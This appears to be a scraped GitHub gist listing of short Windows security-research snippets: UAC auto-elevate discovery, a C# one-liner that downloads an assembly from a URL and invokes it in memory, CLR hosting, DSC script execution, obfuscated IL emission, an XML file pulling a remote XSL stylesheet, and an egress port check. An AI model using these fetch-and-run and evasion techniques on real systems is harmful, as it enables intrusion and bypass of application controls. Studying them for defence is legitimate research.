This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Find Autoelevate executables | |
Write-Host "System32 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black | |
Select-String -Path C:\Windows\System32\*.exe -pattern "<AutoElevate>true" | |
Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black | |
Select-String -Path C:\Windows\SysWOW64\*.exe -pattern "<AutoElevate>true" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This GIST has been transformed into a Git repository and does not receive updates anymore | |
# | |
# Please visit the github repo to get a current list | |
# https://github.com/Neo23x0/ti-falsepositives/ | |
# Hashes that are often included in IOC lists but are false positives | |
HASH_WHITELIST = [ | |
# Empty file | |
'd41d8cd98f00b204e9800998ecf8427e', | |
'da39a3ee5e6b4b0d3255bfef95601890afd80709', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sage.all | |
import hashlib | |
# part1 - https://www.youtube.com/watch?v=Vgdhlh6evjI | |
# part2 - https://www.youtube.com/watch?v=EOlddNofKxo | |
# prepare a table of bits | |
def bits_of(x): | |
bits = [] | |
for c in "{:08b}".format(x): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Matt Graeber, SpecterOps | |
ls C:\* -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | % { | |
try { | |
$Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName) | |
if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') { | |
$_.FullName | |
} | |
} catch {} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This idea originated from this blog post on Invoke DSC Resources directly: | |
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/ | |
<# | |
$MOFContents = @' | |
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref | |
{ | |
ResourceID = "[Script]ScriptExample"; | |
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
${🤷} = New-Object Reflection.Emit.DynamicMethod('💩', [UInt32], @([UInt32], [UInt32])) | |
${🤔} = ${🤷}.GetILGenerator() | |
@(@(2, 275120805),@(3, 275120805),@(88, -261739867),@(42, 23440101)) | % { | |
${🤔}.Emit([Activator]::CreateInstance([System.Reflection.Emit.OpCode], [Reflection.BindingFlags] 'NonPublic, Instance', $null, @(($_[0] -as [System.Reflection.Emit.OpCode].Assembly.GetType('System.Reflection.Emit.OpCodeValues')), $_[1]), $null)) | |
} | |
${💩} = ${🤷}.CreateDelegate([Func``3[UInt32, UInt32, UInt32]]) | |
${💩}.Invoke(2,3) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?> | |
<customers> | |
<customer> | |
<name>Microsoft</name> | |
</customer> | |
</customers> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ugly PowerShell egress check one-liner (works in Constrained Language Mode) | |
# NMap top 50 ports. Checking > 50 may cause Memory DoS | |
foreach ($i in 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154){Start-Job -ScriptBlock {param($i) & Test-NetConnection -ComputerName 10.10.10.10 -Port $i} -ArgumentList $i} Get-Job | Wait-Job | Get-Job | Receive-Job |